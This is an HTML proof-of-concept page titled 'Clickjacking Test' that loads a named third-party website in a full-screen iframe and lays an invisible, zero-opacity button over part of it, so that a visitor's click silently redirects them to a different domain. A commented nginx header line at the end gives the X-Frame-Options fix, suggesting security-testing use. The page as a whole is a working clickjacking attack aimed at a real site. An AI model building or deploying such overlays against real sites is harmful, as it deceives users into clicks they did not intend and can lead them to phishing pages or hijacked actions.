<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Clickjacking Test</title>
    <style>
        iframe {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            border: none; 
            z-index: 1; 
        }
        
        .redirect-button {
            position: absolute;
            top: 73%; 
            left: 70%; 
            transform: translate(-50%, -50%);
            z-index: 2; 
            padding: 15px; 
            background-color: rgba(255, 255, 255, 0); 
            color: rgba(255, 255, 255, 0); 
            cursor: pointer;
            width: 27%; 
            text-align: center;
            opacity: 0; 
        }
       
        .redirect-button:hover {
            background-color: rgba(255, 255, 255, 0.2); /
        }
    </style>
</head>
<body>
    <button class="redirect-button" onclick="window.location.href='https://www.cybersecuree.tech';">Click Me</button>
    <iframe src="https://jeevee.com" title="Target Website"></iframe>
</body>
</html>






<!-- add_header X-Frame-Options SAMEORIGIN always; -->
